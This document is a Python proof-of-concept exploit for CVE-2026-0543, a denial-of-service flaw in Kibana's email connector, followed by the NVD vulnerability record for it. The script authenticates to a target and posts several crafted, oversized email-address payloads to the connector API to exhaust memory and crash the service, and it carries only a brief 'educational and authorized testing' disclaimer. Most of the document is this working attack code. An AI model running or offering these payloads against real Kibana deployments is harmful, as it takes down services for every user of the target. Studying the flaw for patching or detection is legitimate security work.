CVE-2026-0543

#!/usr/bin/env python3 """ CVE-2026-0543 PoC - Kibana Email Connector DoS Description: Improper Input Validation in Kibana's Email Connector allows attackers to cause Excessive Allocation via crafted email addresses. Note: This PoC is for educational and authorized testing purposes only. """ import requests import json import sys TARGET_URL = "https://kibana.example.com" USERNAME = "attacker" PASSWORD = "password" def get_auth_token(): """Authenticate and get access token""" auth_url = f"{TARGET_URL}/api/security/v1/login" headers = {"Content-Type": "application/json", "kbn-xsrf": "true"} data = json.dumps({"username": USERNAME, "password": PASSWORD}) try: response = requests.post(auth_url, headers=headers, data=data, verify=False, timeout=10) if response.status_code == 200: return response.cookies.get_dict() except Exception as e: print(f"Authentication failed: {e}") return None def exploit_dos(auth_cookies): """ Send crafted email address to trigger excessive allocation The payload exploits the improper input validation in email connector """ connector_url = f"{TARGET_URL}/api/actions/connector" headers = {"kbn-xsrf": "true", "Content-Type": "application/json"} # Crafted email address payloads that trigger the vulnerability payloads = [ # Nested special characters causing regex backtracking "a" * 50 + "@" + "b" * 50 + "." + "c" * 50 + "@" + "d" * 50 + "." + "e" * 50, # Repeated special pattern "test" + "." * 100 + "@" + "test" + "." * 100 + "@" + "test" + "." * 100, # Long string with control characters "x" * 1000 + "\n" * 100 + "@" + "y" * 1000 ] for i, payload in enumerate(payloads): exploit_data = { "name": f"Email Connector DoS Test {i}", "connector_type_id": ".email", "config": { "from": "[email protected]", "to": payload }, "secrets": { "user": "smtp_user", "password": "smtp_password" } } try: response = requests.post( connector_url, headers=headers, cookies=auth_cookies, json=exploit_data, timeout=30 ) print(f"Payload {i+1} sent. Status: {response.status_code}") except requests.exceptions.Timeout: print(f"Payload {i+1} triggered timeout - service may be affected") except Exception as e: print(f"Error with payload {i+1}: {e}") def main(): print("CVE-2026-0543 PoC - Kibana Email Connector DoS") print("=" * 50) cookies = get_auth_token() if not cookies: print("Failed to authenticate. Check credentials.") sys.exit(1) print("Authentication successful. Sending exploit payloads...") exploit_dos(cookies) print("Exploitation attempt completed.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-0543", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:51.170", "lastModified": "2026-01-22T20:04:20.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Input Validation (CWE-20) in Kibana's Email Connector can allow an attacker to cause an Excessive Allocation (CAPEC-130) through a specially crafted email address parameter. This requires an attacker to have authenticated access with view-level privileges sufficient to execute connector actions. The application attempts to process specially crafted email format, resulting in complete service unavailability for all users until manual restart is performed."}, {"lang": "es", "value": "La Validación de Entrada Incorrecta (CWE-20) en el Conector de Correo Electrónico de Kibana puede permitir a un atacante causar una Asignación Excesiva (CAPEC-130) a través de un parámetro de dirección de correo electrónico especialmente diseñado. Esto requiere que un atacante tenga acceso autenticado con privilegios de nivel de vista suficientes para ejecutar acciones del conector. La aplicación intenta procesar un formato de correo electrónico especialmente diseñado, lo que resulta en una indisponibilidad completa del servicio para todos los usuarios hasta que se realice un reinicio manual."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndIncluding": "7.17.29", "matchCriteriaId": "8820B4BC-0DAB-4C9B-8053-90DE2C19646E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.19.0", "matchCriteriaId": "5D2BD2D1-17FA-4143-9F5F-ACDA3DA08954"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.1.10", "matchCriteriaId": "FC3281ED-A331-43DC-9705-80A3FA3E6C75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndExcluding": "9.2.4", "matchCriteriaId": "8BF9D6AE-B07F-4516-A684-60B02BF731A0"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-08/384523", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}